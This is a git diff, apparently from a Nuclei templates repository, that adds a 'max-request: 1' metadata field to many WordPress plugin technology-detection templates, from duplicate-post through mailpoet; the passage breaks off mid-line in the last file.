a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: 